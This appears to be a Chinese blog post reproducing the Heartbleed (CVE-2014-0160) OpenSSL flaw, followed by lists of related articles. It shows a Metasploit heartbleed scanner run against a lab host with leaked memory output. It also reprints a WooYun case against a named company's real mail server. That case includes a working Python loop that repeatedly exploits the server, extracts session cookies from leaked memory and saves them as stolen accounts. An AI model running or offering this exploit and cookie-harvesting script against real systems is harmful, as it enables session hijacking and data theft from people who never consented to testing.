漏洞分析的两篇文章

https://blog.csdn.net/javajiawei/article/details/82429886

https://xz.aliyun.com/t/1771

set verbose true 才能看到

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134

rhosts => 172.16.20.134

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 172.16.20.134:443     - Sending Client Hello...

[*] 172.16.20.134:443     - SSL record #1:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  86

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 82

[*] 172.16.20.134:443     -             Type:   Server Hello (2)

[*] 172.16.20.134:443     -             Server Hello Version:           0x0301

[*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b

[*] 172.16.20.134:443     -             Server Hello Session ID length: 32

[*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af

[*] 172.16.20.134:443     - SSL record #2:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  909

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 905

[*] 172.16.20.134:443     -             Type:   Certificate Data (11)

[*] 172.16.20.134:443     -             Certificates length: 902

[*] 172.16.20.134:443     -             Data length: 905

[*] 172.16.20.134:443     -             Certificate #1:

[*] 172.16.20.134:443     -                     Certificate #1: Length: 899

[*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>

[*] 172.16.20.134:443     - SSL record #3:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  331

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 327

[*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)

[*] 172.16.20.134:443     - SSL record #4:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  4

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 0

[*] 172.16.20.134:443     -             Type:   Server Hello Done (14)

[*] 172.16.20.134:443     - Sending Heartbeat...

[*] 172.16.20.134:443     - Heartbeat response, 65535 bytes

[+] 172.16.20.134:443     - Heartbeat response with leak

[*] 172.16.20.134:443     - Printable info leaked:

......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

乌云案例

详细说明:

code 区域

Fortinet邮箱服务器url:https://mail.fortinet.com.cn

存在漏洞的端口:443

该端口存在CVE-2014-0160即心脏滴血漏洞,每次可以读取服务器内存64 KB数据

首先是神器openssl.py测试信息:

code 区域

可以看到账户cookie,可以通过如下脚本,不断的抓cookie:

code 区域

import os

import re

import time

accounts = []

while True:

    result = os.popen('openssl.py mail.fortinet.com.cn').read()

    matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)

    for match in matches:

        if match not in accounts:

            accounts.append(match)

            with open('accounts.txt', 'a') as inFile:

                inFile.write(str(match) + '\n')

            print 'New Account:', match

    time.sleep(1.0)

抓了一小会就有三个:

漏洞证明:

修复方案:

补丁

HEARTBLEED 漏洞复现的更多相关文章

  1. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  2. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  3. ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

    没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...

  4. 【S2-052】漏洞复现(CVE-2017-9805)

    一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2 ...

  5. markdown反射型xss漏洞复现

    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...

  6. WebLogic XMLDecoder反序列化漏洞复现

    WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...

  7. Struts2-052 漏洞复现

    s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描 ...

  8. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  9. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

随机推荐

  1. Java并发编程实战 03互斥锁 解决原子性问题

    文章系列 Java并发编程实战 01并发编程的Bug源头 Java并发编程实战 02Java如何解决可见性和有序性问题 摘要 在上一篇文章02Java如何解决可见性和有序性问题当中,我们解决了可见性和 ...

  2. 记忆化搜索 E - Loppinha, the boy who likes sopinha Gym - 101875E

    E - Loppinha, the boy who likes sopinha Gym - 101875E 这个题目是一个dp,这个应该很容易看出来,但是对于状态的定义其实有点难去想, 看了题解dp[ ...

  3. 初识Java和JDK下载安装

    故事:Java帝国的诞生 对手: C&C++ ◆1972年C诞生 ◆贴近硬件,运行极快,效率极高. ◆操作系统,编译器,数据库,网络系统等 ◆指针和内存管理 ◆1982年C++诞生 ◆面向对象 ...

  4. boost在Qt中的使用

    一.说明 理论上,Qt和boost是同等级别的C++库,如果使用Qt,一般不会需要再用boost,但是偶尔也会有特殊情况,比如,第三方库依赖等等.本文主要介绍boost在windows Qt(MinG ...

  5. 原创Go语言题目(基础)

    题目内容来源于Go语言的经典书籍<GO编程语言> 题目 选择题 1. 下列说法错误的是:A. main包定义了一个独立可执行的二进制程序,以main函数作为程序执行的入口.B. 没有导入需 ...

  6. 房价预测Task1

    pandas:简单的房价预测实例 我们使用pandas等工具,对于给出的.csv文件进行处理,完成要求的几个Task. 利用sklearn的线性回归,对于房价进行简单的预测. 所有的要求,数据集等文件 ...

  7. LabVIEW动态添加控件

    综述: 事例1: 未执行: 执行后:

  8. JS理论-跨域解决方案

    一: 用过JS跨域 1.JSONP跨域(利用script标签不受网站同源策略影响) 2.documen.domian跨域(通过指定基础域名,达到在一个域) 二: 通过服务器跨域 1.通过代理服务器,比 ...

  9. ql的python学习之路-day9

    前言:本节主要学习装饰器 一.装饰器 定义:本质上是个函数,用来装饰其他函数:(就是为其他函数添加附加功能) 原则:1.不能修改被装饰的函数的源代码 2.不能修改被装饰的函数的调用方式 以上两点可以总 ...

  10. Java 如何实现优雅停服?刨根问底

    在 Java 的世界里遨游,如果能拥有一双善于发现的眼睛,有很多东西留心去看,外加耐心助力,仔细去品,往往会品出不一样的味道. 通过本次分享,能让你轻松 get 如下几点,绝对收获满满. a)如何让 ...